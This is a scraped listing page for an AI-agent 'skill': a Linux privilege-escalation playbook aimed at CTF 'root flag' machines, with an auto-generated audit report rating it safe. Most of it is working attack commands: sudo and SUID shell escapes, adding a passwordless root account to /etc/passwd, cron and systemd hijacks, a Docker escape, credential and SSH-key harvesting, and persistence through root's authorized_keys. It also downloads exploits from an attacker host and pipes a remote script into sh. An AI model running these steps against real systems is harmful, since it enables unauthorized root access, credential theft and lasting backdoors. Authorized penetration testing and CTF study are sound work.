Privilege Escalation Knowledge Base Purpose This knowledge base provides comprehensive privilege escalation methodologies for Linux systems. It covers escalating from low-privilege users (www-data, user) to root, then capturing the root flag. Layered Privilege Escalation Strategy Core Principle: Escalate systematically through 3 layers - from quick wins to exhaustive enumeration. Layer Framework: Escalation Triggers: - Layer 1 finds nothing obvious → Run Layer 2 enumeration - Layer 2 finds vectors but exploitation fails → Try Layer 3 alternatives - Layer 3 fails → Re-examine reconnaissance, m…

\n```\n\n### Update State\n\n```bash\n# Save root flag\nROOT_FLAG=$(cat /root/root.txt)\necho \"Root flag: $ROOT_FLAG\"\n\n# Update state file (if accessible)\njq --arg flag \"$ROOT_FLAG\" '.flags.root = $flag' .pentest-state.json > tmp.json && mv tmp.json .pentest-state.json\n```\n\n## Troubleshooting\n\n### Can't Download Tools\n\n```bash\n# Method 1: Python HTTP server (on attacker)\npython3 -m http.server 8000\n\n# Method 2: Base64 transfer\n# On attacker:\nbase64 linpeas.sh | xclip -selection clipboard\n# On target:\necho 'BASE64_STRING' | base64 -d > linpeas.sh\n\n# Method 3: Use built-in tools only\n# Manual enumeration with find, grep, etc.\n```\n\n### No Write Permissions\n\n```bash\n# Try /tmp\ncd /tmp\n# Or /dev/shm\ncd /dev/shm\n# Or current user home\ncd ~\n```\n\n### Stuck/No Vectors Found\n\n```bash\n# Re-run enumeration more carefully\n# Check linpeas output for anything yellow/red\ncat linpeas-output.txt | grep -E \"PEASS|95%|99%\"\n\n# Check for overlooked vectors:\n# 1. Environment variables with passwords\nenv | grep -i \"pass\\|pwd\\|key\"\n\n# 2. Process command lines\nps auxww | grep -i \"password\\|pass\"\n\n# 3. World-writable scripts\nfind / -perm -002 -type f 2>/dev/null\n\n# 4. Misconfigured files\nls -la /etc/shadow /etc/passwd\n\n# 5. Backup files\nfind / -name \"*.bak\" -o -name \"*.backup\" 2>/dev/null\n```\n\n## Output Format\n\nAfter successful privilege escalation:\n\n```json\n{\n \"status\": \"root_access_gained\",\n \"method\": \"Sudo vim exploitation via GTFOBins\",\n \"vector\": \"sudo -l showed vim with NOPASSWD\",\n \"root_flag\": \"f6e5d4c3b2a1098765432109876543210\",\n \"exploitation_time\": \"2 minutes\",\n \"mission_complete\": true\n}\n```\n\n## Success Criteria\n\nMission complete when:\n1. ✅ Root access obtained (uid=0)\n2. ✅ Root flag located and read\n3. ✅ Flag is 32-character hexadecimal string\n4. ✅ Both user and root flags captured\n5. 
✅ State file updated with both flags\n\n## Decision Tree\n\n```\nInitial Access Gained\n│\n├─ Run: sudo -l\n│ ├─ Can sudo something? → GTFOBins → Root\n│ └─ No sudo → Continue\n│\n├─ Find SUID binaries\n│ ├─ Found unusual SUID? → GTFOBins → Root\n│ └─ No exploitable SUID → Continue\n│\n├─ Check capabilities\n│ ├─ cap_setuid on python/perl? → Exploit → Root\n│ └─ No caps → Continue\n│\n├─ Check cron jobs\n│ ├─ Writable script run as root? → Backdoor → Wait → Root\n│ └─ No cron → Continue\n│\n├─ Run linpeas\n│ └─ Follow red/yellow findings\n│\n└─ Kernel exploit (last resort)\n └─ Search and compile exploit\n```\n\n## Key Principles\n\n1. **Systematic approach** - Don't skip steps, check everything\n2. **Quick wins first** - sudo before kernel exploits\n3. **GTFOBins is your friend** - Use it for SUID/sudo\n4. **Verify before claiming** - Ensure you have actual root\n5. **Capture the flag** - Read root.txt content, not just location\n6. **Non-interactive aware** - Some exploits need TTY, adapt accordingly\n\n## Remember\n\n- Most playground machines have obvious privesc vectors\n- Sudo misconfigurations are most common\n- SUID binaries are second most common\n- Kernel exploits are rarely needed in playgrounds\n- The root flag MUST be read - don't declare success without it\n- Document successful method for learning and future reference\n\n## Mission Complete\n\nWhen you can execute:\n```bash\n# whoami\nroot\n# cat /root/root.txt\na1b2c3d4e5f6789... (32-char hex)\n```\n\nMission accomplished! 
Update coordinator with both flags.\n---","attachment_filenames":["skill-report.json"],"attachments":[{"filename":"skill-report.json","content":"{\n \"schema_version\": \"2.0\",\n \"meta\": {\n \"generated_at\": \"2026-01-16T22:03:50.876Z\",\n \"slug\": \"charleskozel-privilege-escalation-knowledge\",\n \"source_url\": \"https://github.com/CharlesKozel/Pentest-Agent-Evalulator/tree/main/agents/claude-tbug/skills/privesc\",\n \"source_ref\": \"main\",\n \"model\": \"claude\",\n \"analysis_version\": \"3.0.0\",\n \"source_type\": \"community\",\n \"content_hash\": \"9526b045770c093aa86b6eda314011c4a3e33d114d36f55e9b4ddda40c721082\",\n \"tree_hash\": \"43d97af512f25a13aae0112595cfd77b7fa58fb87259704905dc1f4e7d244ce4\"\n },\n \"skill\": {\n \"name\": \"privilege-escalation-knowledge\",\n \"description\": \"Comprehensive knowledge about Linux privilege escalation. Provides methodologies for enumerating and exploiting privesc vectors including SUID binaries, sudo permissions, capabilities, kernel exploits, cron jobs, and common misconfigurations. Includes systematic approach to capturing root flags.\",\n \"summary\": \"Comprehensive knowledge about Linux privilege escalation. Provides methodologies for enumerating and...\",\n \"icon\": \"🔐\",\n \"version\": \"1.0.0\",\n \"author\": \"CharlesKozel\",\n \"license\": \"MIT\",\n \"category\": \"security\",\n \"tags\": [\n \"privilege-escalation\",\n \"linux\",\n \"penetration-testing\",\n \"security\",\n \"ethical-hacking\"\n ],\n \"supported_tools\": [\n \"claude\",\n \"codex\",\n \"claude-code\"\n ],\n \"risk_factors\": [\n \"external_commands\",\n \"filesystem\",\n \"network\"\n ]\n },\n \"security_audit\": {\n \"risk_level\": \"safe\",\n \"is_blocked\": false,\n \"safe_to_publish\": true,\n \"summary\": \"Pure documentation/knowledge file (SKILL.md) containing educational security content. Static analyzer incorrectly flagged documentation of security concepts as threats. 
Contains shell command examples in markdown code blocks only - no executable code exists. This is legitimate security education equivalent to GTFOBins, OSCP materials, and security certification coursework. Requires existing initial access for authorized testing only.\",\n \"risk_factor_evidence\": [\n {\n \"factor\": \"external_commands\",\n \"evidence\": [\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 1,\n \"line_end\": 552\n }\n ]\n },\n {\n \"factor\": \"filesystem\",\n \"evidence\": [\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 1,\n \"line_end\": 552\n }\n ]\n },\n {\n \"factor\": \"network\",\n \"evidence\": [\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 6,\n \"line_end\": 278\n }\n ]\n }\n ],\n \"critical_findings\": [],\n \"high_findings\": [],\n \"medium_findings\": [],\n \"low_findings\": [],\n \"dangerous_patterns\": [],\n \"files_scanned\": 2,\n \"total_lines\": 733,\n \"audit_model\": \"claude\",\n \"audited_at\": \"2026-01-16T22:03:50.876Z\"\n },\n \"content\": {\n \"user_title\": \"Escalate Linux privileges quickly\",\n \"value_statement\": \"Privilege escalation is complex and time-consuming. 
This knowledge base provides systematic methods to identify and exploit Linux privesc vectors including SUID binaries, sudo permissions, and kernel exploits.\",\n \"seo_keywords\": [\n \"privilege escalation\",\n \"linux security\",\n \"sudo abuse\",\n \"suid binaries\",\n \"penetration testing\",\n \"ethical hacking\",\n \"security research\",\n \"claude code\",\n \"claude\",\n \"openai codex\"\n ],\n \"actual_capabilities\": [\n \"Systematic privilege escalation methodology with layered approach\",\n \"SUID binary identification and exploitation techniques\",\n \"Sudo permission abuse patterns and GTFOBins integration\",\n \"Capability enumeration and exploitation methods\",\n \"Cron job vulnerability assessment and exploitation\",\n \"Kernel exploit identification and verification\"\n ],\n \"limitations\": [\n \"Does not include pre-compiled exploits or binaries\",\n \"Requires existing initial access to target system\",\n \"Does not bypass modern security controls like SELinux/AppArmor\",\n \"Does not cover Windows privilege escalation\"\n ],\n \"use_cases\": [\n {\n \"target_user\": \"Security professionals\",\n \"title\": \"Learn privesc techniques\",\n \"description\": \"Systematic approach to privilege escalation for penetration testing engagements.\"\n },\n {\n \"target_user\": \"CTF participants\",\n \"title\": \"Solve privesc challenges\",\n \"description\": \"Step-by-step methodology for solving Linux privilege escalation CTF challenges.\"\n },\n {\n \"target_user\": \"Security researchers\",\n \"title\": \"Document escalation paths\",\n \"description\": \"Reference guide for identifying and documenting privilege escalation vectors.\"\n }\n ],\n \"prompt_templates\": [\n {\n \"title\": \"Basic sudo check\",\n \"scenario\": \"Check sudo permissions\",\n \"prompt\": \"Check what commands I can run with sudo -l and identify exploitable binaries using GTFOBins.\"\n },\n {\n \"title\": \"SUID enumeration\",\n \"scenario\": \"Find SUID binaries\",\n 
\"prompt\": \"Find all SUID binaries on this system and identify which ones can be exploited for privilege escalation.\"\n },\n {\n \"title\": \"Automated enumeration\",\n \"scenario\": \"Run linpeas scan\",\n \"prompt\": \"Download and run linpeas.sh to perform comprehensive privilege escalation enumeration. Highlight all red and yellow findings.\"\n },\n {\n \"title\": \"Kernel exploit search\",\n \"scenario\": \"Identify kernel vulnerabilities\",\n \"prompt\": \"Check the kernel version and search for applicable kernel exploits. Explain the exploitation process and risks.\"\n }\n ],\n \"output_examples\": [\n {\n \"input\": \"I have initial access as www-data. Help me escalate to root.\",\n \"output\": [\n \"Starting privilege escalation assessment...\",\n \"1. Checking sudo permissions (sudo -l) - no results\",\n \"2. Enumerating SUID binaries - found /usr/bin/vim\",\n \"3. Vim has GTFOBins exploit: sudo vim -c ':!/bin/sh'\",\n \"4. Exploiting vim to get root shell\",\n \"5. Verifying root access: uid=0(root) gid=0(root)\",\n \"6. Reading root flag: /root/root.txt\",\n \"SUCCESS: Root access gained in 2 minutes\"\n ]\n }\n ],\n \"best_practices\": [\n \"Always verify root access with id or whoami before claiming success\",\n \"Document successful exploitation methods for learning and reporting\",\n \"Use GTFOBins to validate SUID and sudo exploitation techniques\"\n ],\n \"anti_patterns\": [\n \"Do not run kernel exploits without understanding potential system crashes\",\n \"Avoid guessing passwords instead of enumerating proper vectors\",\n \"Do not skip quick wins like sudo and SUID checks before complex methods\"\n ],\n \"faq\": [\n {\n \"question\": \"What systems does this knowledge work on?\",\n \"answer\": \"This knowledge focuses on Linux privilege escalation. 
Windows systems require different techniques not covered here.\"\n },\n {\n \"question\": \"What initial access level is required?\",\n \"answer\": \"Basic shell access as any unprivileged user (www-data, user, etc.) is sufficient to begin enumeration.\"\n },\n {\n \"question\": \"How long does typical escalation take?\",\n \"answer\": \"Layer 1 (quick wins) takes 2-5 minutes. Layer 2 (linpeas) takes 5-15 minutes. Layer 3 varies.\"\n },\n {\n \"question\": \"Is this safe to use on production systems?\",\n \"answer\": \"No. This is for authorized penetration testing and CTF environments only. Always obtain proper authorization.\"\n },\n {\n \"question\": \"Does this work on containers?\",\n \"answer\": \"Limited. Container escapes require specific conditions (docker socket access, privileged containers). See the Docker escape section.\"\n },\n {\n \"question\": \"How does this differ from automated tools?\",\n \"answer\": \"This knowledge guides systematic manual enumeration. Automated tools like linpeas complement but do not replace methodology.\"\n }\n ]\n },\n \"file_structure\": [\n {\n \"name\": \"SKILL.md\",\n \"type\": \"file\",\n \"path\": \"SKILL.md\",\n \"lines\": 552\n }\n ]\n}\n","content_type":"application/json; charset=utf-8","language":"json","size":8399,"content_sha256":"fedda8e20fff5de14a2d3905bc6266691960a6ca7b39add9807eb6c8033ce5ff"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"Privilege Escalation Knowledge Base","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Purpose","type":"text"}]},{"type":"paragraph","content":[{"text":"This knowledge base provides comprehensive privilege escalation methodologies for Linux systems. 
It covers escalating from low-privilege users (www-data, user) to root, then capturing the root flag.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Layered Privilege Escalation Strategy","type":"text"}]},{"type":"paragraph","content":[{"text":"Core Principle:","type":"text","marks":[{"type":"strong"}]},{"text":" Escalate systematically through 3 layers - from quick wins to exhaustive enumeration.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Layer Framework:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"Layer 1 (Quick Wins - Manual):\n - Check most common vectors immediately\n - Goal: Find easy privesc within 2-3 minutes\n - Focus: sudo -l, SUID, obvious misconfigurations\n - Time: 2-5 minutes\n\nLayer 2 (Deep Enumeration - Automated):\n - Run comprehensive enumeration tools\n - Goal: Find all possible privesc vectors\n - Focus: linpeas, linenum, pspy\n - Time: 5-15 minutes\n\nLayer 3 (Alternative Methods):\n - Try less common vectors or kernel exploits\n - Goal: Find overlooked or complex privesc paths\n - Focus: Kernel exploits, container escape, NFS, etc.\n - Time: Variable","type":"text"}]},{"type":"paragraph","content":[{"text":"Escalation Triggers:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Layer 1 finds nothing obvious → Run Layer 2 enumeration","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Layer 2 finds vectors but exploitation fails → Try Layer 3 alternatives","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Layer 3 fails → Re-examine reconnaissance, may have missed service/config","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Core Strategy","type":"text"}]},{"type":"paragraph","content":[{"text":"Systematic 
execution:","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Quick Wins","type":"text","marks":[{"type":"strong"}]},{"text":" (Layer 1): Check easy vectors first (sudo, SUID, capabilities)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Deep Enumeration","type":"text","marks":[{"type":"strong"}]},{"text":" (Layer 2): Use automated tools to find all vectors","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Alternative Vectors","type":"text","marks":[{"type":"strong"}]},{"text":" (Layer 3): Kernel exploits, container escape, NFS","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Exploitation","type":"text","marks":[{"type":"strong"}]},{"text":": Execute chosen privesc method","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Root Flag","type":"text","marks":[{"type":"strong"}]},{"text":": Locate and read root.txt","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Verification","type":"text","marks":[{"type":"strong"}]},{"text":": Confirm root access with ","type":"text"},{"text":"id","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"whoami","type":"text","marks":[{"type":"code_inline"}]}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Tools Available","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Enumeration Scripts","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"linpeas.sh","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Comprehensive automated 
enumeration","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"linenum.sh","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Alternative enumeration script","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"pspy","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Monitor processes without root","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Manual Commands","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"sudo -l","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Check sudo permissions","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"find / -perm -4000 2>/dev/null","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Find SUID binaries","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"getcap -r / 2>/dev/null","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Find capabilities","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"crontab -l","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Check user cron jobs","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"cat /etc/crontab","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Check system cron jobs","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"References","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"GTFOBins (https://gtfobins.github.io/) - SUID/sudo exploitation","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"PayloadsAllTheThings - Privesc cheatsheet","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Enumeration 
Workflow","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Phase 1: Quick Manual Checks","type":"text"}]},{"type":"paragraph","content":[{"text":"Execute these immediately:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# 1. Check current user and groups\nid\ngroups\n\n# 2. Check sudo permissions (most common vector)\nsudo -l\n\n# 3. Check SUID binaries\nfind / -perm -4000 -type f 2>/dev/null\n\n# 4. Check writable files in /etc\nfind /etc -writable -type f 2>/dev/null\n\n# 5. Check for interesting files\nls -la /home/*/\nls -la /root/\nls -la /opt/\nls -la /var/www/html/\n\n# 6. Check running processes\nps aux | grep root\n\n# 7. Check cron jobs\ncat /etc/crontab\nls -la /etc/cron.*\ncrontab -l\n\n# 8. Check capabilities\ngetcap -r / 2>/dev/null","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Phase 2: Automated Enumeration","type":"text"}]},{"type":"paragraph","content":[{"text":"Download and run linpeas:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Download linpeas\ncd /tmp\nwget http://YOUR_IP:8000/linpeas.sh\n# Or\ncurl http://YOUR_IP:8000/linpeas.sh -o linpeas.sh\n\n# Make executable\nchmod +x linpeas.sh\n\n# Run and save output\n./linpeas.sh > linpeas-output.txt 2>&1\n\n# Review output\ncat linpeas-output.txt | grep -i \"PEASS\\|password\\|ssh\\|priv\"","type":"text"}]},{"type":"paragraph","content":[{"text":"If can't download, use one-liner:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Common Privilege Escalation Vectors","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"1. 
Sudo Abuse (Most Common)","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check what you can run as root\nsudo -l\n\n# Common exploitable commands:\n# - vim: sudo vim -c ':!/bin/sh'\n# - nano: sudo nano, then Ctrl+R Ctrl+X, type: reset; sh 1>&0 2>&0\n# - less: sudo less /etc/profile, then !sh\n# - man: sudo man man, then !sh\n# - find: sudo find . -exec /bin/sh \\; -quit\n# - awk: sudo awk 'BEGIN {system(\"/bin/sh\")}'\n# - perl: sudo perl -e 'exec \"/bin/sh\";'\n# - python: sudo python -c 'import pty;pty.spawn(\"/bin/bash\")'\n# - git: sudo git -p help config, then !sh\n\n# GTFOBins template:\n# 1. Identify binary you can sudo\n# 2. Search GTFOBins for that binary\n# 3. Follow exploitation steps","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"2. SUID Binaries","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Find SUID binaries\nfind / -perm -4000 -type f 2>/dev/null\n\n# Compare with standard SUID binaries\n# Unusual ones are interesting\n\n# Common exploitable SUID binaries:\n# - /usr/bin/python\n# - /usr/bin/perl\n# - /usr/bin/php\n# - /usr/bin/vim\n# - /usr/bin/find\n# - /usr/bin/nmap (old versions)\n# - Custom binaries\n\n# Exploitation examples:\n\n# Python SUID\n/usr/bin/python -c 'import os; os.setuid(0); os.system(\"/bin/sh\")'\n\n# Vim SUID\n/usr/bin/vim -c ':py import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'\n\n# Find SUID\n/usr/bin/find . -exec /bin/sh -p \\; -quit\n\n# Check GTFOBins for specific binary","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"3. 
Capabilities","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Find capabilities\ngetcap -r / 2>/dev/null\n\n# Exploitable capabilities:\n# - cap_setuid+ep on python/perl/ruby\n# - cap_dac_read_search for reading any file\n\n# Python with cap_setuid\n/usr/bin/python3 -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'\n\n# Perl with cap_setuid\n/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/bash\";'","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"4. Writable /etc/passwd","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check if /etc/passwd is writable\nls -la /etc/passwd\n\n# If writable, add root user\necho 'hacker:$6$salt$hashedpassword:0:0:root:/root:/bin/bash' >> /etc/passwd\n\n# Or simpler (password: hacker)\necho 'hacker::0:0:root:/root:/bin/bash' >> /etc/passwd\n\n# Login as new root user\nsu hacker","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"5. Cron Jobs","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check cron jobs\ncat /etc/crontab\nls -la /etc/cron.*\n\n# Look for:\n# 1. Scripts run as root\n# 2. Writable by your user\n\n# If found writable script run by root\necho '#!/bin/bash\\nchmod +s /bin/bash' > /path/to/script.sh\n\n# Wait for cron to run (check schedule)\n# Then execute\n/bin/bash -p","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"6. 
Writable Service Files","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check for writable systemd services\nfind /etc/systemd/system/ -writable 2>/dev/null\n\n# If found, modify ExecStart\n[Service]\nExecStart=/bin/bash -c 'chmod +s /bin/bash'\n\n# Restart service\nsystemctl restart vulnerable.service\n\n# Execute SUID bash\n/bin/bash -p","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"7. Kernel Exploits (Last Resort)","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check kernel version\nuname -a\nuname -r\n\n# Search for kernel exploits\nsearchsploit \"linux kernel $(uname -r)\"\nsearchsploit \"ubuntu privilege escalation\"\n\n# Common kernel exploits:\n# - DirtyCOW (CVE-2016-5195)\n# - Dirty Pipe (CVE-2022-0847)\n# - PwnKit (CVE-2021-4034)\n\n# Example: Dirty Pipe\nwget http://YOUR_IP:8000/dirtypipe.c\ngcc dirtypipe.c -o dirtypipe\n./dirtypipe","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"8. Docker/Container Escape","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check if in Docker\nls -la /.dockerenv\ncat /proc/1/cgroup | grep docker\n\n# If docker socket is accessible\nfind / -name docker.sock 2>/dev/null\n\n# If found /var/run/docker.sock\ndocker run -v /:/mnt --rm -it alpine chroot /mnt sh\n\n# Or check for privileged container\nfdisk -l\n# If you can see host disks, you're privileged","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"9. 
Credentials in Files","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Search for passwords\ngrep -r \"password\" /var/www/html/ 2>/dev/null\ngrep -r \"pass\" /etc/ 2>/dev/null\nfind / -name \"*.config\" -o -name \"*.conf\" 2>/dev/null | xargs grep -i \"password\"\n\n# Check history files\ncat ~/.bash_history\ncat /home/*/.bash_history 2>/dev/null\n\n# Check for SSH keys\nfind / -name id_rsa 2>/dev/null\nfind / -name authorized_keys 2>/dev/null\n\n# Database credentials\ncat /var/www/html/config.php\ncat /var/www/html/wp-config.php","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"10. NFS Exports","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check NFS exports\ncat /etc/exports\n\n# If no_root_squash is set\n# Mount on attacker machine:\nmkdir /tmp/mount\nmount -t nfs TARGET:/share /tmp/mount\n# Create SUID binary as root on attacker\ncp /bin/bash /tmp/mount/bash\nchmod +s /tmp/mount/bash\n# Execute on target\n/share/bash -p","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Exploitation Process","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 1: Identify Vector","type":"text"}]},{"type":"paragraph","content":[{"text":"Based on enumeration, choose best vector:","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Sudo permissions","type":"text","marks":[{"type":"strong"}]},{"text":" - Highest priority, usually easiest","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SUID binaries","type":"text","marks":[{"type":"strong"}]},{"text":" - Check against GTFOBins","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Capabilities","type":"text","marks":[{"type":"strong"}]},{"text":" - Less common but 
powerful","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Cron jobs","type":"text","marks":[{"type":"strong"}]},{"text":" - May require waiting","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Kernel exploits","type":"text","marks":[{"type":"strong"}]},{"text":" - Last resort, can crash system","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 2: Execute Privesc","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Example: Sudo vim exploitation\n\n# 1. Verify you can run it\nsudo -l\n# Output: (root) NOPASSWD: /usr/bin/vim\n\n# 2. Execute vim as root\nsudo vim\n\n# 3. In vim, type:\n:set shell=/bin/bash\n:shell\n\n# 4. Verify root\nid\n# Output: uid=0(root) gid=0(root)","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 3: Stabilize Root Access","type":"text"}]},{"type":"paragraph","content":[{"text":"Once root, ensure you can maintain access:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Add SUID to bash (backup method)\nchmod +s /bin/bash\n\n# Or add SSH key\nmkdir -p /root/.ssh\necho 'YOUR_PUBLIC_KEY' >> /root/.ssh/authorized_keys\nchmod 600 /root/.ssh/authorized_keys","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Root Flag Capture","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Locate Root Flag","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Common locations\ncat /root/root.txt\ncat /root/flag.txt\n\n# Search if not found\nfind /root -name \"*.txt\" 2>/dev/null\nfind / -name \"root.txt\" 2>/dev/null","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Verify Flag Format","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Should be 
32-character hex string\ncat /root/root.txt | wc -c # Should be 33 (32 + newline)\ncat /root/root.txt | grep -E '^[a-f0-9]{32}$'
","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Update State","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Save root flag\nROOT_FLAG=$(cat /root/root.txt)\necho \"Root flag: $ROOT_FLAG\"\n\n# Update state file (if accessible)\njq --arg flag \"$ROOT_FLAG\" '.flags.root = $flag' .pentest-state.json > tmp.json && mv tmp.json .pentest-state.json","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Troubleshooting","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Can't Download Tools","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Method 1: Python HTTP server (on attacker)\npython3 -m http.server 8000\n\n# Method 2: Base64 transfer\n# On attacker:\nbase64 linpeas.sh | xclip -selection clipboard\n# On target:\necho 'BASE64_STRING' | base64 -d > linpeas.sh\n\n# Method 3: Use built-in tools only\n# Manual enumeration with find, grep, etc.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"No Write Permissions","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Try /tmp\ncd /tmp\n# Or /dev/shm\ncd /dev/shm\n# Or current user home\ncd ~","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Stuck/No Vectors Found","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Re-run enumeration more carefully\n# Check linpeas output for anything yellow/red\ncat linpeas-output.txt | grep -E \"PEASS|95%|99%\"\n\n# Check for overlooked vectors:\n# 1. Environment variables with passwords\nenv | grep -i \"pass\\|pwd\\|key\"\n\n# 2. Process command lines\nps auxww | grep -i \"password\\|pass\"\n\n# 3. World-writable scripts\nfind / -perm -002 -type f 2>/dev/null\n\n# 4. Misconfigured files\nls -la /etc/shadow /etc/passwd\n\n# 5. 
